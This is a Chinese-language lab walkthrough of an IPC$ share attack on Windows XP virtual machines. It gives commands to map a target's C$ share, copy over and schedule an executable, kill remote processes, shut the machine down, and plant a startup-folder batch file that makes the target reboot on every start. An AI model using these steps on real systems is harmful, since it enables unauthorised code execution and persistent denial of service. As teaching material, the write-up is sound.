我的实验环境是两台虚拟机，分别是windows xp sp3和windows xp sp2 。windows xp sp3作为主机，windows xp sp2作为靶机：

1.首先在靶机端运行cmd，输入命令net share查看当前系统中的硬盘是否处于共享状态，windows xp等在默认情况下都是开启资源共享服务的，同时查看windows xp的IP地址为192.168.44.130

2.文件共享服务对应的端口号分别是139（供NetBios名称使用），445（供IP地址使用），一般IPC$连接也是通过这两个端口的，所以在windows 2000的命令行中输入netstat –an查看当前这两个端口是否处于开启状态，如下图：

3.开始在windows xp端进行IPC$连接，在cmd中输入

net  use \\192.168.44.130\ipc$  “(此处为计算机用户的密码)” /user:”(用户名)”，如下图：

可以看到命令成功完成，说明建立IPC空会话成功

4.将windows 2000系统上C盘的内容共享，使用如下命令：

net use z: \\192.168.44.130\c$

输入该命令后，在主机系统上就会出现共享C盘内容的Z盘驱动器，如下图：

5.向远程计算机复制文件，把windows xp系统C盘上的sogou_explorer.exe 复制到靶机的C盘上，并命名为sogou_explorer.exe，过程如下图：

命令如下：copy c:\sogou_explorer.exe z:\sogou_explorer.exe：

可以看到Z盘上出现了sogou_explorer.exe文件：

6.查看靶机的系统时间，命令是 net time \\192.168.44.130:

7.令远程计算机运行指定程序：

用如下命令：at \\192.168.44.130 9:27 c:\sogou_explorer.exe  可以看到新添加了一项作业：

8. 列出远程计算机当前运行的进程,在命令行中输入

tasklist /s 192.168.44.130 /u (远程计算机用户名) /p (密码)：

9.终止远程计算机中当前运行的进程：

我选择终止的进程是cmd.exe 进程PID是3596

输入命令：taskkill /s 192.168.44.130 /u (远程计算机用户名) /p (密码)：

可以看到PID为3596的cmd.exe进程被终止了：

10. 关闭远程计算机：在命令行中输入命令：

shutdown –s –t 30–m \\192.168.44.130 令远程计算机倒计时30秒后自动关机：

事实上在远程计算机上可以看到它自己被远程用户连接，打开计算机管理，点击共享文件夹中的会话，可以看到当前计算机用户被远程连接了，还有连接时间，打开文件等信息显示:

接下来再做一件事，让对方主机开机后自动重启，首先在主机上编写shutdown.bat文件，文件内容是shutdown –r 将该文件通过上面的copy方式复制到靶机中，将shutdown.bat文件拷贝到启动文件夹中，则当靶机开机时会自动运行该bat文件，过程如下图:

在主机中点开我的电脑中的Z盘，即共享出的靶机的C盘资源，将这个shutdown.bat文件剪切粘贴到Z盘的启动目录 Z:\Documents and Settings\All Users\[开始]菜单\程序\启动，这样靶机在开机后会自动运行这个bat文件，就会出现开机自动重启的情况：